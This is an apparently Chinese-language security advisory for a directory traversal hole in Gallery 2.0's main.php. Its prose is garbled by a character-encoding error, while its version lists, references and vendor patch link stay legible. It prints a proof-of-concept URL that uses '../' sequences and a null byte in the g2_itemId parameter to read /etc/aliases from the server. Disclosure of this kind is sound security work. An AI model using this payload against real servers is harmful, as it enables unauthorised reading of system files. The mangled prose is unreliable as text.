Gallery main.phpÔ¶³ÌĿ¼±éÀú©¶´

Éæ¼°³ÌÐò£º
Gallery³ÌÐò
 
ÃèÊö£º
Gallery main.phpÔ¶³ÌĿ¼±éÀú©¶´
 
 
Ïêϸ£º
GalleryÊÇ»ùÓÚWebµÄ¿ª·ÅÔ´ÂëÏà²á¹ÜÀíÆ÷¡£

GalleryÖдæÔÚĿ¼±éÀú©¶´£¬¹¥»÷Õß¿ÉÒÔͨ¹ýÌØÖƵÄurlÎÞÐèµÇ¼±ã·ÃÎÊ·þÎñÆ÷ÖÐwebserver¿É·ÃÎʵÄÈÎÒâÎļþ£¬µ¼ÖÂй©Ãô¸ÐÐÅÏ¢¡£

<*À´Ô´£ºMichael Dipper £¨micha@dipper.info£©
 £ £ Bharat Mediratta £¨bharat@menalto.com£©

Á´½Ó£ºhttp://marc.theaimsgroup.com/?l=bugtraq&m=112931748803188&w=2
*>

ÊÜÓ°Ïìϵͳ£º
Gallery Gallery 2.0 Beta 3
Gallery Gallery 2.0 Beta 2
Gallery Gallery 2.0 Beta 1
Gallery Gallery 2.0 Alpha 4
Gallery Gallery 2.0 Alpha 3
Gallery Gallery 2.0 Alpha 2
Gallery Gallery 2.0 Alpha 1
Gallery Gallery 2.0
²»ÊÜÓ°Ïìϵͳ£º
Gallery Gallery Remote
Gallery Gallery 2.0.1
Gallery Gallery 1.x
 
¹¥»÷·½·¨£º
¾¯ ¸æ

ÒÔϳÌÐò(·½·¨)¿ÉÄÜ´øÓй¥»÷ÐÔ£¬½ö¹©°²È«Ñо¿Óë½Ìѧ֮Óá£Ê¹ÓÃÕß·çÏÕ×Ô¸º£¡

http://example.com/gallery2/main.php?g2_itemId=/../../../../../../../etc/aliases%00 Íø¹ÜÍøwww.bitscn.com
 
 
½â¾ö·½°¸£º
³§É̲¹¶¡£º

Gallery
-------
Ä¿Ç°³§ÉÌÒѾ­·¢²¼ÁËÉý¼¶²¹¶¡ÒÔÐÞ¸´Õâ¸ö°²È«ÎÊÌ⣬Çëµ½³§É̵ÄÖ÷Ò³ÏÂÔØ£º

* Gallery Upgrade gallery-2.0.1-typical.tar.gz
http://prdownloads.sourceforge.net/gallery/gallery-2.0.1-typical.tar.gz